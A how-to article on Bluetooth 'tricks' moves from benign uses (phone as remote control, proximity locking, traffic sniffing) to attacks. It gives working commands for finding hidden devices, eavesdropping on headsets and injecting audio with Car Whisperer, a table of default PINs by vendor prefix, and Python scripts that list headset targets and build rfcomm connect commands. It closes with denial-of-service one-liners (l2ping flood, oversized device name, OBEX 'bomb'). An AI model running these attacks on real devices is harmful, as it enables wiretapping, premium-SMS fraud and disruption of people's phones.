Bluetooth tricks

Mutt

Everyone knows that Bluetooth lets you send a file from one device to another or connect a wireless headset. But its capabilities are not limited to that. With the right tool at hand you can work real miracles. So why not try yourself as a magician?

A built-in Bluetooth module (or, more officially, IEEE 802.15.1) has long ceased to be a curiosity. The module costs so little that only a lazy manufacturer does not build it into a phone, laptop or PDA, and even then only for marketing reasons. In short, almost everyone uses Bluetooth. But only a few know that by using the technology they risk giving away their confidential data. Still, let's start with the good things!

Trick 1: Using BT to Access Your Computer Remotely
Once, for a presentation, I invited a long-legged friend to press the space bar to turn over the slides in PowerPoint. This pleasure cost me an expensive lunch and two hours of empty conversation with the Barbie girl. After that I firmly decided: next time I would get around the lack of a remote control in a different way. And I got around it using a mobile phone! Yes, yes, you can flip through slides right from your phone, control music, and God knows what else. The only requirement is that both the phone and the computer have BT modules. Not only will you save money and energy, you will also look unforgivably fashionable. Anyone can show such a trick with the utility Bluetooth Remote Control, recently updated to version 3.0.

It lets you control your computer from the screen of any mobile phone. Everything is very simple: a server part is installed on the computer, and a client program written in Java (MIDP 2.0 required) on the phone. After setting up this simple scheme you can remotely control the computer's mouse and keyboard. And most importantly, you get a remote desktop. A real Remote Desktop right on your mobile screen! And with the long-legged friend you can then spend the time much more successfully. Bluetooth Remote Control comes in handy here too: to put on romantic music :).

Trick 2: BT Access Control
If you work in a room with about a dozen colleagues, you have probably had to lock your computer when leaving for another room. Why? You hardly have time to leave before someone is already rummaging through your hard drive. Not the most pleasant situation. So the computer must be locked; the question is how. You can use the standard Windows facilities and type a long password ten times a day. Or do it elegantly with Bluetooth. It is as simple as two times two: you walk away from the computer and it locks immediately; you come back and the lock is gone! The only condition is that both the computer and the mobile phone have a Bluetooth module, and that the LockItNow program is installed on the system (you can easily write such a program yourself; we devoted a whole article to it). You can then tell friends and colleagues about your telepathic abilities, and later sell the secret for money :). By the way, if there is no BT module at hand, it can be replaced with a phone that supports Bluetooth, plugged in via a COM port.

Trick 3: Snip BT traffic off the air
Mastery starts with understanding. Have you ever wanted to look inside the protocol and find out how data exchange over the "blue tooth" actually happens? With an ordinary adapter, listening to Bluetooth traffic works only "on itself": you intercept the outgoing and incoming traffic of the host on which you issue the commands. The key part here is the Host Controller Interface (HCI), which gives access to the transmitter. In the Netgraph stack (see the next trick) the HCI node connects to the Bluetooth device driver node (downstream) and to the L2CAP node (upstream). Windows does not provide this out of the box, but third-party developers have released special drivers that turn a standard dongle into a sniffer. The reference product in this area is the FTS4BT Wireless Bluetooth Protocol Analyzer, which costs a lot of money. Its selling point is support for the new Bluetooth v2.0+EDR, on which modern devices run, and moreover it decodes all traffic from the air on the fly, neatly sorting audio, application-protocol data and much more. Clearly, for sniffing (and in general) the most useful adapters are class 1 USB dongles, whose range reaches about a hundred metres.

Trick 4: Working with BT Adapter Directly
For a long time the Bluetooth stacks for Windows provided such meagre capabilities that programmers simply bypassed the platform. This explains why most programs for serious fun with the "blue tooth" are developed for *nix. We will look at some of the tricks on that platform, namely FreeBSD (remember that we put the latest 7.0 release of this OS on the disk of the previous issue). Bluetooth has been officially supported there only since the 5.x branch, on top of the Netgraph subsystem. Happily, most USB adapters work with the ng_ubt driver (it must be loaded before the device is plugged in). Let's try?
  1. Load the driver, then plug in the adapter: kldload ng_ubt
  2. Copy the stack start-up script to a convenient place: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Start the stack on the adapter: sh /usr/local/etc/rc.bluetooth start ubt0

Now let me introduce the hccontrol utility. It is one of the main programs for working with the BT module: it performs all operations related to the HCI interface and has the syntax hccontrol -n <hci_node_name> <command>. Let's check that our device works by scanning the air for other devices:
Code:
hccontrol -n ubt0hci inquiry

As a result the utility prints information about the devices found, including their addresses (BD_ADDR, a six-byte identifier in the same format as a MAC address). Note that every Bluetooth device, be it a headset or an ordinary phone, represents a certain set of services. The basic list includes: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (Dial-Up Networking), FAX (Fax), FTRN (OBEX File Transfer), HSET (Headset), NAP (Network Access Point). To find out which services a particular device provides, a request over a special protocol, SDP (Service Discovery Protocol), is used. The SDP server runs directly on the device and is a purely informational component (it cannot be influenced). You can determine which services the discovered devices provide with the corresponding utility:
Code:
# sdpcontrol -a <device BD_ADDR> browse
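To make the inquiry listing usable in scripts, here is a small parser, added as an example and not taken from the article or from FreeBSD, that reads the output format of hccontrol's inquiry command and decodes the 24-bit Class of Device (CoD) field into service bits, major and minor class. The same decoder explains the value 0x500204 that Trick 6 uses to pose as a phone. The sample listing is constructed in hccontrol's output format (one "Inquiry result #N" block per device, the class shown as three bytes, most significant first); the first address is arbitrary, the second is the headset address used later in the article.

```python
"""Parse `hccontrol -n ubt0hci inquiry` output and decode the Class of Device.

Added example; the CoD layout follows the Bluetooth Assigned Numbers:
bits 0-1 format, bits 2-7 minor class, bits 8-12 major class, bits 13-23 service classes.
"""
import re

SERVICE_BITS = {
    13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer",
    21: "Audio", 22: "Telephony", 23: "Information",
}
MAJOR = {0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network Access Point",
         4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable",
         8: "Toy", 9: "Health", 31: "Uncategorized"}
MINOR = {
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
    4: {0: "Uncategorized", 1: "Wearable headset", 2: "Hands-free",
        4: "Microphone", 5: "Loudspeaker", 6: "Headphones",
        7: "Portable audio", 8: "Car audio"},
}

# Constructed sample in hccontrol's output format (not a real capture).
SAMPLE = """\
Inquiry result, num_responses=2
Inquiry result #0
        BD_ADDR: 00:80:37:29:19:a4
        Page Scan Rep. Mode: 0x1
        Page Scan Period Mode: 00
        Page Scan Mode: 00
        Class: 52:02:04
        Clock offset: 0x78ef
Inquiry result #1
        BD_ADDR: 00:0a:3a:54:71:95
        Page Scan Rep. Mode: 0x1
        Page Scan Period Mode: 00
        Page Scan Mode: 00
        Class: 20:04:04
        Clock offset: 0x1b2c
Inquiry complete. Status: No error [00]
"""


def decode_cod(cod: int) -> dict:
    """Split a 24-bit Class of Device into its named parts."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    services = [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)]
    return {
        "major": MAJOR.get(major, f"major 0x{major:02x}"),
        "minor": MINOR.get(major, {}).get(minor, f"minor 0x{minor:02x}"),
        "services": services,
    }


def parse_inquiry(text: str) -> list:
    """Return one dict per 'Inquiry result #N' block: address, raw CoD and its decoding."""
    devices = []
    for block in re.split(r"Inquiry result #\d+", text)[1:]:
        # Each block is a set of "Key: value" lines; keys never contain a colon.
        fields = dict(re.findall(r"^\s*([^:\n]+):\s*(.+)$", block, re.M))
        if "BD_ADDR" not in fields or "Class" not in fields:
            continue
        cod = int(fields["Class"].replace(":", ""), 16)   # "52:02:04" -> 0x520204
        devices.append({"bdaddr": fields["BD_ADDR"].lower(), "cod": cod, **decode_cod(cod)})
    return devices


if __name__ == "__main__":
    for dev in parse_inquiry(SAMPLE):
        print(f"{dev['bdaddr']}  CoD 0x{dev['cod']:06x}  {dev['major']} / {dev['minor']}"
              f"  services={dev['services']}")
    print("0x500204 ->", decode_cod(0x500204))
```

The classic headset class 0x200404 decodes to major Audio/Video, minor Wearable headset, with only the Audio service bit set; that is the signature worth filtering on when hunting for Trick 6 targets, rather than matching on names.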

Trick 5: Find Hidden Devices
So we scanned the air and even found out what services are available on the active devices. But here's the catch! Some devices do not give away their presence at all, because they are in "undiscoverable" mode and do not respond to inquiry requests. You probably know this security option from your own phone's settings. Such devices can still be found, however!

The best-known technique for detecting them is a dumb brute force of device addresses, that is, sequentially sending requests (for example a remote name request) to every address in a certain range. For this there is a very simple utility, Redfang, which walks through a range of addresses (in practice the lower three bytes, once the manufacturer prefix is known, because the upper three bytes of a BD_ADDR identify the vendor) and thus detects hidden devices.

Another option is a passive technique: leave your own adapter discoverable, give it some attractive name, and log who comes to connect to it:
Code:
hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

As a result all incoming connection attempts are displayed with the address of the peer, and among them there may well be "friends" with hidden identifiers: a device does not need to be discoverable to reveal its address when it initiates a connection to you.

Trick 6: Intercept Headset Conversations
One of the main threats to any radio technology is that data can be intercepted. The first thing that comes to mind for Bluetooth is listening in on the conversations of people using a headset. And often it is quite real! At the What The Hack festival in the Netherlands, experts from the Trifinite group demonstrated how, using a laptop with Linux, a special program and a directional antenna, you can eavesdrop on what the driver of a passing car is saying through a Bluetooth headset. The group developed the Car Whisperer program. Its capabilities are relatively modest: you can listen only to those who forgot to change the factory PIN for Bluetooth pairing, such as "0000" or "1234". But such poor fellows, believe me, are very, very many! The "whisperer" is able to wedge itself in and successfully complete the pairing, receiving the audio that the car kit or headset transmits to the mobile phone. Note: the utility allows you not only to receive the audio passing between the headset and the mobile, but also to inject your own. We decided to test the program's capabilities by downloading Car Whisperer from the developers' site.

Before starting, it is recommended to change the class of your own device, especially if the program will be used from a computer:
Code:
hciconfig hci0 class 0x500204
# 0x500204 is a "phone" class: major class Phone, minor Cellular, Telephony and Object Transfer service bits set

Otherwise some "smart" devices may suspect that something is wrong. The syntax of the utility looks like this:
Code:
./carwhisperer <hci device number> <file to inject into the line> <file to capture the line into> <device address> [channel]

We took the file to inject directly from the utility's folder and specified out.raw as the capture file (the first argument is the adapter index, i.e. hci0):
Code:
./carwhisperer 0 message.raw /tmp/out.raw 00:15:0E:91:19:73

The result is the file out.raw. You cannot play it as is: it is raw 8 kHz 16-bit signed mono PCM and has to be converted to an audio format, which requires an additional utility. Plenty of audio converters will do, such as SoX (the command uses the option syntax of the SoX version of that time; in current SoX, -s -w is written -e signed-integer -b 16):
Code:
sox -t raw -r 8000 -c 1 -s -w out.raw -t wav -r 44100 -c 2 out.wav

Besides listening, you can connect to the device, browse its phone book and use other hands-free features over Bluetooth. The principle is this: first a search for active devices is performed and each is checked for the HS (Headset) service. Next, the device's address is taken and a connection attempt is made with the default PIN. If the connection is established, you can do whatever you want with the device (within the available set of AT commands).

In practice it looks like this. First we search all active devices for the headset service with the command "sdptool search HS", which gives a response like this:
Code:
Inquiring ...
Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
  "Headset" (0x1108)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Language Base Attr List:
  code_ISO639: 0x656e
  encoding: 0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0100

Next, an RFCOMM connection is opened to the headset's control channel (the audio itself travels over a separate SCO link) with the command "rfcomm connect 2 00:0A:3A:54:71:95 7", where the last argument is the RFCOMM channel that SDP reported (7 in the listing above; it differs from device to device, so always take it from the SDP record), and the necessary AT commands are sent through /dev/rfcomm2. Here is a small statistical note on the pairing PINs of some models of wireless headsets, by address prefix:
Code:
Nokia (00:02:EE...) - pin="5475"
Audi UHV (00:0E:9F...) - pin="1234"
O'Neill (00:80:37...) - pin="8761"
Cellink (00:0A:94...) - pin="1234"
Eazix (00:0C:84...) - pin="1234"

By the way, the same principle can be used for unauthorised connections to all other devices. Using AT commands over RFCOMM you can, for example, read an SMS message or even send one from someone else's phone to a premium-rate number, costing the owner of the device money. Be vigilant!
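The reconnaissance steps just described (find Headset records, take their RFCOMM channel, try the vendor default PIN) as an added Python example, not the article's or BlueZ's own code: it parses the output format of "sdptool search HS", keeps only records that really carry the Headset service class with an RFCOMM channel, looks up the default PIN by address prefix from the table above, and prints the rfcomm command with the channel the device advertised. The sample text is the listing above plus a constructed second device and a third that answered nothing; the PIN table is only what the article lists, not a complete vendor database.

```python
"""Parse `sdptool search HS` output and derive, per headset found, the RFCOMM
control channel to connect to and the vendor default PIN (when the article lists one)."""
import re

# Default PINs per vendor address prefix (OUI), as listed in the article for some headsets.
DEFAULT_PINS = {
    "00:02:EE": "5475",  # Nokia
    "00:0E:9F": "1234",  # Audi UHV
    "00:80:37": "8761",  # O'Neill
    "00:0A:94": "1234",  # Cellink
    "00:0C:84": "1234",  # Eazix
}
HEADSET_UUID = "0x1108"  # Service Class ID "Headset"

# Constructed sample: the article's record (channel 7), a second headset on channel 1,
# and a device that was queried but returned no record.
SAMPLE = """\
Inquiring ...
Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
  "Headset" (0x1108)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Language Base Attr List:
  code_ISO639: 0x656e
  encoding: 0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0100
Searching for HS on 00:02:EE:8A:3C:11 ...
Service Name: Headset
Service RecHandle: 0x10003
Service Class ID List:
  "Headset" (0x1108)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0100
Searching for HS on 00:80:37:29:19:A4 ...
"""


def default_pin(bdaddr: str):
    """Look up the article's default PIN by the first three bytes of the address."""
    return DEFAULT_PINS.get(bdaddr.upper()[:8])


def parse_sdptool(text: str) -> list:
    """Return one dict per service record: bdaddr, name, class UUIDs, RFCOMM channel."""
    records = []
    # "Searching for HS on <addr> ..." is printed once per device queried, even when that
    # device returns no record; re.split with a group yields [prefix, addr1, body1, addr2, ...].
    parts = re.split(r"(?m)^Searching for \S+ on ([0-9A-Fa-f:]{17}) \.\.\.[ \t]*$", text)
    for bdaddr, body in zip(parts[1::2], parts[2::2]):
        for m in re.finditer(r"Service Name: (.*?)\n(.*?)(?=\nService Name:|\Z)", body, re.S):
            name, attrs = m.group(1), m.group(2)
            # Only the indented lines under "Service Class ID List:" are service classes;
            # the protocol and profile descriptor lists also contain "(0x....)" entries.
            cls = re.search(r"Service Class ID List:\n((?:[ \t]+.*\n?)*)", attrs)
            uuids = re.findall(r'"[^"]*" \((0x[0-9A-Fa-f]+)\)', cls.group(1)) if cls else []
            chan = re.search(r'"RFCOMM".*?\n[ \t]*Channel: (\d+)', attrs, re.S)
            records.append({
                "bdaddr": bdaddr.upper(),
                "name": name.strip(),
                "class_ids": [u.lower() for u in uuids],
                "channel": int(chan.group(1)) if chan else None,
            })
    return records


def headsets(text: str) -> list:
    """Only records that really are the Headset service and reachable over RFCOMM."""
    return [r for r in parse_sdptool(text)
            if HEADSET_UUID in r["class_ids"] and r["channel"] is not None]


def rfcomm_command(rec: dict, dev: int = 2) -> str:
    """BlueZ command binding /dev/rfcomm<dev> to the headset's *advertised* channel."""
    return f"rfcomm connect {dev} {rec['bdaddr']} {rec['channel']}"


if __name__ == "__main__":
    for rec in headsets(SAMPLE):
        pin = default_pin(rec["bdaddr"]) or "not in table"
        print(f"{rec['bdaddr']}  channel {rec['channel']}  default PIN {pin}")
        print("   ", rfcomm_command(rec))
```

Taking the channel from the record instead of hard-coding 1 is the point: the article's own listing advertises channel 7, and a connection to the wrong channel simply fails or lands on another service.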

Trick 7: DoS BT Devices
The approach is traditional. A denial-of-service attack is possible whenever the target device has to do far more work to handle a request than the attacker spends sending it. It can hang the phone or quickly drain its battery. There are several ways to carry out the attack. Let's start with the standard tools. The most obvious is to ping the device with large packets, which is done by giving the packet size with the "-s" option of the l2ping utility (add -f to flood without waiting for replies):
Code:
# l2ping -s 10000 -f <device address>

The program itself, as you have already understood, is a relative of ping in the Bluetooth world and serves to check that a device is reachable. Another method, fundamentally different from the first, is the "fuzzing" technique, a kind of lottery, because it is not known in advance what will happen. It is a new trend in finding vulnerabilities in products without analysing their source code: the technique relies only on interactive communication with the target in a language it understands, but with completely chaotic arguments and values. The hacker's task would be to make the visible name of the phone consist of a sufficiently large number of characters (note that the HCI Change_Local_Name parameter is a fixed 248-byte field, so a remote party sees at most 248 bytes of such a name). When such a name is picked up by the "master", an overflow or denial of service occurs in about 70% of cases (the author's figure):
Code:
hciconfig hci0 name `perl -e 'print "ash" x 3137'`
# command for Linux
hccontrol -n ubt0hci change_local_name "new name"
# example for FreeBSD

Many phones are still unable to digest "bomb" files. Here is a simple implementation of a similar technique.
  1. First prepare the "bomb". A well-known example: echo `perl -e 'print "skvz" x 3137'` > file
  2. Then push it with a modified OBEX client based on USSP-PUSH (xmailserver.org/ussp-push.html), giving the same oversized string as the remote file name and the target's OBEX push channel (3 here): ./obextool push file 00:0A:3A:54:71:95 `perl -e 'print "skvz" x 3137'` 3
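To see what the two standard-tool attacks above actually put on the wire, here is an added Python example (not from the article, l2ping or BlueZ) that builds the HCI Change_Local_Name command behind hciconfig name and the L2CAP Echo Request behind l2ping -s, with a small receiver-side parser that checks the length fields instead of trusting them. Packet layouts and opcodes follow the Bluetooth core specification (HCI command: H4 type byte 0x01, 16-bit opcode OGF<<10|OCF, parameter length, parameters; L2CAP: 16-bit length, 16-bit CID, then for the signalling channel a code, identifier, length and data). The name and size are the article's own values.

```python
"""HCI and L2CAP packets behind `hciconfig hci0 name ...` and `l2ping -s <size>`.

Added example; constants are from the Bluetooth core specification.
"""
import struct

HCI_COMMAND_PKT = 0x01          # H4 packet-type indicator for HCI commands
OGF_HOST_CTL = 0x03             # Controller & Baseband command group
OCF_CHANGE_LOCAL_NAME = 0x0013
LOCAL_NAME_LEN = 248            # Local_Name is a fixed 248-octet parameter

L2CAP_SIGNALLING_CID = 0x0001
L2CAP_ECHO_REQ = 0x08           # signalling code of an Echo Request


def hci_opcode(ogf: int, ocf: int) -> int:
    return (ogf << 10) | ocf


def hci_change_local_name(name: bytes) -> bytes:
    """HCI_Change_Local_Name as a conforming stack issues it: the name is cut at 248
    octets and zero-padded, so a 9411-byte "bomb" leaves the adapter as 248 bytes."""
    field = name[:LOCAL_NAME_LEN].ljust(LOCAL_NAME_LEN, b"\x00")
    header = struct.pack("<BHB", HCI_COMMAND_PKT,
                         hci_opcode(OGF_HOST_CTL, OCF_CHANGE_LOCAL_NAME), len(field))
    return header + field


def l2cap_echo_request(ident: int, payload: bytes) -> bytes:
    """L2CAP Echo Request (what l2ping -s <size> sends) on the signalling channel:
    basic header (length, CID), signalling header (code, id, length), then data."""
    sig = struct.pack("<BBH", L2CAP_ECHO_REQ, ident & 0xFF, len(payload)) + payload
    return struct.pack("<HH", len(sig), L2CAP_SIGNALLING_CID) + sig


def parse_l2cap_echo(pkt: bytes):
    """Receiver side done carefully: every length field is checked against the
    bytes actually present before any of them is used."""
    if len(pkt) < 8:
        raise ValueError("truncated L2CAP packet")
    l2len, cid = struct.unpack_from("<HH", pkt, 0)
    if cid != L2CAP_SIGNALLING_CID or l2len != len(pkt) - 4:
        raise ValueError("L2CAP length does not match packet size")
    code, ident, slen = struct.unpack_from("<BBH", pkt, 4)
    if code != L2CAP_ECHO_REQ or slen != l2len - 4:
        raise ValueError("signalling length does not match L2CAP length")
    return ident, pkt[8:8 + slen]


if __name__ == "__main__":
    bomb = b"ash" * 3137                       # the article's name: 9411 bytes locally
    pkt = hci_change_local_name(bomb)
    print(f"name {len(bomb)} bytes -> HCI command {len(pkt)} bytes, "
          f"opcode 0x{hci_opcode(OGF_HOST_CTL, OCF_CHANGE_LOCAL_NAME):04x}")
    echo = l2cap_echo_request(1, b"\x00" * 10000)   # l2ping -s 10000
    print(f"echo request {len(echo)} bytes, L2CAP length field "
          f"{struct.unpack_from('<H', echo)[0]}, payload 10000")
    print("round trip:", parse_l2cap_echo(echo)[0])
```

The practical reading: the name trick stresses how the victim handles a maximal-length, not necessarily NUL-terminated 248-byte name, not a 9 KB one, while l2ping -s 10000 stresses how it reassembles a signalling PDU far larger than the 48-byte signalling MTU the specification guarantees; a stack that validates lengths the way parse_l2cap_echo does simply drops the packet.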

Thanks for attention!
 